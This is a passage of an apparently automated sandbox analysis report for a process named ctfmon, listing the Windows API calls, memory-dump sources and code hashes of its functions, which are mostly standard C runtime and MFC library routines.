        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: StringType$ByteCharMultiWide
        • String ID: @$@
        • API String ID: 3852931651-2930932199
        • Opcode ID: 637b9a2027f8d11f9ba14c48296acc9abc446613b4d653ebd54a83bfefdd23d3
        • Instruction ID: 1c15a09582e329dc3b7eb93bde5ac744ef8d040035c95133badfe14c744ef744
        • Opcode Fuzzy Hash: 637b9a2027f8d11f9ba14c48296acc9abc446613b4d653ebd54a83bfefdd23d3
        • Instruction Fuzzy Hash: 64519231D00709EBCF219F95DC46AEF7FB4FB89750F20452AF410A6290D3749991DBA8
        APIs
        • __EH_prolog.LIBCMT ref: 0040AE0F
        • VariantClear.OLEAUT32(?), ref: 0040AEB4
        • SysFreeString.OLEAUT32(00000000), ref: 0040AF35
        • SysFreeString.OLEAUT32(00000000), ref: 0040AF44
        • SysFreeString.OLEAUT32(00000000), ref: 0040AF53
        • VariantClear.OLEAUT32(?), ref: 0040AF5D
        • VariantClear.OLEAUT32(?), ref: 0040AF6E
          • Part of subcall function 0040A633: __EH_prolog.LIBCMT ref: 0040A638
          • Part of subcall function 0040A633: VariantClear.OLEAUT32(00000007), ref: 0040AB8C
          • Part of subcall function 0040A633: VariantClear.OLEAUT32(?), ref: 0040AD99
          • Part of subcall function 0040CE35: VariantCopy.OLEAUT32(?,?), ref: 0040CE3D
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Variant$Clear$FreeString$H_prolog$Copy
        • String ID: `DvP?Dv
        • API String ID: 3345578691-2995021381
        • Opcode ID: 527a1c3fc3581c05ebe35c4305d89dfccdc4838b1892ceeab9f248ec18f835ab
        • Instruction ID: 7a1db6359f3125c85e1e53df7fe4f0938f48fa671959c3eaa9cad5873132af52
        • Opcode Fuzzy Hash: 527a1c3fc3581c05ebe35c4305d89dfccdc4838b1892ceeab9f248ec18f835ab
        • Instruction Fuzzy Hash: 815128B1A00309EFDB14DFA4C884BEEBBB8FF08704F10452AE115A7291D774A955CB95
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: __ftol$ModeRelease
        • String ID: W
        • API String ID: 1379597261-655174618
        • Opcode ID: fa7acd1234dd63ba8f1e8afded327bb42ab26611bd1c67e31014e76cbf7f569f
        • Instruction ID: 8ca894d6ef4fa197229fbb959d41c86698faa0bbb9e13a2d725a5857b8f61538
        • Opcode Fuzzy Hash: fa7acd1234dd63ba8f1e8afded327bb42ab26611bd1c67e31014e76cbf7f569f
        • Instruction Fuzzy Hash: 55415D74A01209EFDB14CF98D589AEEBBB0FF44300F1584AAE855AB392C7389E50CF54
        APIs
        • GetStockObject.GDI32(00000011), ref: 004253A8
        • GetStockObject.GDI32(0000000D), ref: 004253B0
        • GetObjectW.GDI32(00000000,0000005C,?), ref: 004253BD
        • GetDC.USER32(00000000), ref: 004253CC
        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004253E3
        • MulDiv.KERNEL32(?,00000048,00000000), ref: 004253EF
        • ReleaseDC.USER32(00000000,00000000), ref: 004253FA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Object$Stock$CapsDeviceRelease
        • String ID: System
        • API String ID: 46613423-3470857405
        • Opcode ID: b5aa894935c3560286c83436582695622890635bab9a7bdb21018ccdce49e049
        • Instruction ID: f46f37b3d3d4612b8e83e0057ece6bda57a43c624d054bcf47829690f41a9a48
        • Opcode Fuzzy Hash: b5aa894935c3560286c83436582695622890635bab9a7bdb21018ccdce49e049
        • Instruction Fuzzy Hash: 3B117731B00728ABEB109BA59C49FAF7B68AB04795F904026FA05E71D1D7749C42C7A4
        APIs
        • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,00410685,?,Microsoft Visual C++ Runtime Library,00012010,?,0042F07C,?,0042F0CC,?,?,?,Runtime Error!Program: ), ref: 004154BA
        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004154D2
        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004154E3
        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004154F0
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AddressProc$LibraryLoad
        • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
        • API String ID: 2238633743-4044615076
        • Opcode ID: 5ab5992dddaa3f7fa0f417d9efb794b7685826fe295bf1f12a020d1beb63436b
        • Instruction ID: 4643cc2abfda65c973c0f230a36f017a01bddbd01039f16f24786c98e207d1fc
        • Opcode Fuzzy Hash: 5ab5992dddaa3f7fa0f417d9efb794b7685826fe295bf1f12a020d1beb63436b
        • Instruction Fuzzy Hash: 7D017571B00611EF8710AFF5ADC4D9B3BAB9AA8690354083BA504D2721DB78C88DAB34
        APIs
        • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,00424101,?,00020000), ref: 00423E10
        • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 00423E19
        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00423E2D
        • #17.COMCTL32 ref: 00423E48
        • #17.COMCTL32 ref: 00423E64
        • FreeLibrary.KERNEL32(00000000), ref: 00423E70
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Library$AddressFreeHandleLoadModuleProc
        • String ID: COMCTL32.DLL$InitCommonControlsEx
        • API String ID: 1437655972-4218389149
        • Opcode ID: fbc2046041922bd786504a1cdf1c0074c3bd5e3fbe41aaae23bd871ef4b93d28
        • Instruction ID: 75276020c994f243a46c4147610413596e97131f96f2929e1f4ad0196d98a365
        • Opcode Fuzzy Hash: fbc2046041922bd786504a1cdf1c0074c3bd5e3fbe41aaae23bd871ef4b93d28
        • Instruction Fuzzy Hash: D0F08632B403229786216FE8AC8891F72A8AB947527960476F450E3210CF28ED078B7E
        APIs
        • CompareStringW.KERNEL32(00000000,00000000,0042F1F8,00000001,0042F1F8,00000001,00000000,-00000004,00000001,?,00414AD9,0040F5F7,00000000,?,?,0040F46A), ref: 00417B7E
        • CompareStringA.KERNEL32(00000000,00000000,0042F1F4,00000001,0042F1F4,00000001,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417B9B
        • CompareStringA.KERNEL32(00000000,00000000,00000000,00000000,0040F46A,?,00000000,-00000004,00000001,?,00414AD9,0040F5F7,00000000,?,?,0040F46A), ref: 00417BF9
        • GetCPInfo.KERNEL32(?,00000000,00000000,-00000004,00000001,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417C4A
        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417CC9
        • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,00000000,?,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D2A
        • MultiByteToWideChar.KERNEL32(?,00000009,0040F46A,?,00000000,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D3D
        • MultiByteToWideChar.KERNEL32(?,00000001,0040F46A,?,?,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D89
        • CompareStringW.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417DA1
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ByteCharCompareMultiStringWide$Info
        • String ID:
        • API String ID: 1651298574-0
        • Opcode ID: 626c00746097870350dcb73b9ce94af668f21a0bcfd9788210486e2b273a240b
        • Instruction ID: 7b3f78671b9cc246bcbdba2b09b373ac3ce48b51b29b8ccc2d9feaddae2fe836
        • Opcode Fuzzy Hash: 626c00746097870350dcb73b9ce94af668f21a0bcfd9788210486e2b273a240b
        • Instruction Fuzzy Hash: FD71AF7590824AAFDF219F94EC819EF7BB5FF45344F10012BF950A2260D3398D91DBA9
        APIs
        • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,0040D0BE), ref: 0040FDFC
        • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,0040D0BE), ref: 0040FE10
        • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,0040D0BE), ref: 0040FE31
        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040FE68
        • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,0040D0BE), ref: 0040FE88
        • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,?,0040D0BE), ref: 0040FEA6
        • FreeEnvironmentStringsA.KERNEL32(00000000,?,00000000,?,?,?,0040D0BE), ref: 0040FEDB
        • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,0040D0BE,?,00000000,?,?,?,0040D0BE), ref: 0040FF0B
        • FreeEnvironmentStringsA.KERNEL32(00000000,?,00000000,?,?,?,0040D0BE), ref: 0040FF41
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
        • String ID:
        • API String ID: 158306478-0
        • Opcode ID: 38c6228edd32d6f1fba469b4e4b004e6b126ab12aff7eee28f25b7e0406bb547
        • Instruction ID: aa68c8225dd583959b6512c48fc187da00978e995f8350bfac9d4924fef5e386
        • Opcode Fuzzy Hash: 38c6228edd32d6f1fba469b4e4b004e6b126ab12aff7eee28f25b7e0406bb547
        • Instruction Fuzzy Hash: 60413632A042126BD731AB64EC44B3B7698EB51714F11053BF801F3BE2DB7C9C4946D8
        APIs
        • GetCurrentThreadId.KERNEL32 ref: 0041DA97
        • EnterCriticalSection.KERNEL32(00540EE0), ref: 0041DAA4
        • LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041DAEC
        • CallNextHookEx.USER32(00000000,?,?,?), ref: 0041DB03
        • LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041DB1E
        • GetWindowLongA.USER32(?,000000F0), ref: 0041DB62
        • SendMessageA.USER32(?,000011F0,00000000,00000001), ref: 0041DB89
        • GetParent.USER32(?), ref: 0041DBF1
        • CallNextHookEx.USER32(?,?,?,?), ref: 0041DC2E
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalSection$CallHookLeaveNext$CurrentEnterLongMessageParentSendThreadWindow
        • String ID:
        • API String ID: 1151315845-0
        • Opcode ID: d73eb355c938408c093bacc49a2554f20d8b0ef65da80eb48a7d5ecfde790e24
        • Instruction ID: 3545cc89381b001688f13769ec11b2821f14b273c618948fc64cceaa8c3ba814
        • Opcode Fuzzy Hash: d73eb355c938408c093bacc49a2554f20d8b0ef65da80eb48a7d5ecfde790e24
        • Instruction Fuzzy Hash: 9C41DAB5A44310EBD720DF10EC85BEB7764FB59358F14042AFA0593292D778A8CDC7A9
        APIs
        • EnterCriticalSection.KERNEL32(00540EE0,?,0041C90F), ref: 0041D4B6
        • GlobalDeleteAtom.KERNEL32(?), ref: 0041D4F2
        • GlobalDeleteAtom.KERNEL32(?), ref: 0041D50D
        • GlobalDeleteAtom.KERNEL32(?), ref: 0041D520
        • GlobalDeleteAtom.KERNEL32(?), ref: 0041D533
        • GlobalDeleteAtom.KERNEL32(?), ref: 0041D546
        • GlobalDeleteAtom.KERNEL32(?), ref: 0041D559
        • GlobalDeleteAtom.KERNEL32(?), ref: 0041D56C
        • LeaveCriticalSection.KERNEL32(00540EE0,?,0041C90F), ref: 0041D57D
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AtomDeleteGlobal$CriticalSection$EnterLeave
        • String ID:
        • API String ID: 3843206905-0
        • Opcode ID: 2b75fa68889f91098e5643466e8799e8587f338c2001ebdaef05f8f721e44a84
        • Instruction ID: 13cd0210057b9161806c39b4b786d17877643f6b89466e3cfc64d8f8ea033297
        • Opcode Fuzzy Hash: 2b75fa68889f91098e5643466e8799e8587f338c2001ebdaef05f8f721e44a84
        • Instruction Fuzzy Hash: 40113DBDC00215B1D7356BA4EC086EA36B5A71A70CF246422E600476F0D7BC58CEDFAC
        APIs
        • GetStringTypeW.KERNEL32(00000001,0042F1F8,00000001,?,7622E860,0053FD88,?,?,00416871,?,?,?,00000000,00000001), ref: 00416C7E
        • GetStringTypeA.KERNEL32(00000000,00000001,0042F1F4,00000001,?,?,00416871,?,?,?,00000000,00000001), ref: 00416C98
        • GetStringTypeA.KERNEL32(?,?,?,?,qhA,7622E860,0053FD88,?,?,00416871,?,?,?,00000000,00000001), ref: 00416CCC
        • MultiByteToWideChar.KERNEL32(?,0053FD89,?,?,00000000,00000000,7622E860,0053FD88,?,?,00416871,?,?,?,00000000,00000001), ref: 00416D04
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00416871,?), ref: 00416D5A
        • GetStringTypeW.KERNEL32(?,?,00000000,qhA,?,?,?,?,?,?,00416871,?), ref: 00416D6C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: StringType$ByteCharMultiWide
        • String ID: qhA
        • API String ID: 3852931651-109923292
        • Opcode ID: 150e23084c8718023d15674a9defdb49b39a0b8ce7e63f20e8833cea17a168bd
        • Instruction ID: 03fcf75f4968f94f2bb644bc32e47f6b93cad4a4674484b923943e54a38a0d42
        • Opcode Fuzzy Hash: 150e23084c8718023d15674a9defdb49b39a0b8ce7e63f20e8833cea17a168bd
        • Instruction Fuzzy Hash: 0641AD72A00219AFCF219F94EC86EEF7BB8FB08754F214526F911D2250D338C991DBA5
        APIs
        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 004105CE
        • GetStdHandle.KERNEL32(000000F4,0042F07C,00000000,00000000,00000000,?), ref: 004106A4
        • WriteFile.KERNEL32(00000000), ref: 004106AB
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: File$HandleModuleNameWrite
        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
        • API String ID: 3784150691-4022980321
        • Opcode ID: c0987cdfdb90bcd61f79998fa3c49d719af975966672589e0cb3e741b420638c
        • Instruction ID: c02292fbb0e4d8d3e6b59c55069bed7ebd2c7da6c3cacf8f517a257bbcbb3b0a
        • Opcode Fuzzy Hash: c0987cdfdb90bcd61f79998fa3c49d719af975966672589e0cb3e741b420638c
        • Instruction Fuzzy Hash: 6031D672B00218AEDF20DAA0CD45FDE376DDF85304F90046BF544D6191E6F8AAD58A5D
        APIs
        • __EH_prolog.LIBCMT ref: 00406D42
        • GetStockObject.GDI32(00000011), ref: 00406D75
        • GetStockObject.GDI32(0000000D), ref: 00406D80
        • GetObjectW.GDI32(00406E87,0000005C,?), ref: 00406DAE
        • GetDeviceCaps.GDI32(?,0000005A), ref: 00406E1D
        • #253.OLEPRO32(00000020,0042F580,?,?), ref: 00406E49
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Object$Stock$#253CapsDeviceH_prolog
        • String ID:
        • API String ID: 1238440774-3916222277
        • Opcode ID: 0886e04da2797d501dfa00fad7a766727e3081159960d1d571b8e29a0e902311
        • Instruction ID: ff0ac20cef680e3f131b4560153c210be97b3ea0a685f7a4baa30aa74b484bf8
        • Opcode Fuzzy Hash: 0886e04da2797d501dfa00fad7a766727e3081159960d1d571b8e29a0e902311
        • Instruction Fuzzy Hash: C2414974E012299ECB10DFA5D9807EDBBB0BF18304F5040BAE555F7281E7785A45CFA8
        APIs
        • GetMonitorInfoW.USER32(?,?), ref: 00405C1D
        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405C44
        • GetSystemMetrics.USER32(00000000), ref: 00405C5C
        • GetSystemMetrics.USER32(00000001), ref: 00405C63
        • lstrcpyW.KERNEL32(?,DISPLAY), ref: 00405C87
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: System$InfoMetrics$MonitorParameterslstrcpy
        • String ID: B$DISPLAY
        • API String ID: 1771318095-3316187204
        • Opcode ID: 45d5df4bb5912470cd260a2f1592e2a4264016a8dfc306c8960ab1dc3bceefa8
        • Instruction ID: 930622f50884a770117930609482ab71e3439554aa9ec88adfacdbd60153f98a
        • Opcode Fuzzy Hash: 45d5df4bb5912470cd260a2f1592e2a4264016a8dfc306c8960ab1dc3bceefa8
        • Instruction Fuzzy Hash: D611E031600B20ABEF119F64DC89A9BBBA8EF09B50B044473FC05AE181D3B5D941CFE9
        APIs
        • __EH_prolog.LIBCMT ref: 00407CAA
          • Part of subcall function 00407A77: CoGetClassObject.OLE32(00000000,?,00000000,0042F6B0,00000003,?,?,?,?,00407CD3,?,00000000,00000003,0042F710,?,?), ref: 00407A97
          • Part of subcall function 00426B33: __EH_prolog.LIBCMT ref: 00426B38
          • Part of subcall function 00426C0F: __EH_prolog.LIBCMT ref: 00426C14
        • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 00407E30
        • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 00407E51
        • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00407E99
        • GlobalLock.KERNEL32(00000000), ref: 00407EA7
        • GlobalUnlock.KERNEL32(?), ref: 00407EBF
        • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 00407EE2
        • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,00000000), ref: 00407EFE
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
        • String ID:
        • API String ID: 645133905-0
        • Opcode ID: 302024f70b7680546cec5b29f2414604d49aed9f3e4cc86d70ec7265d503e271
        • Instruction ID: 7a88ba2808e2917381c35da6fa48b70894891fb86309c958b2177dbe66a41b7c
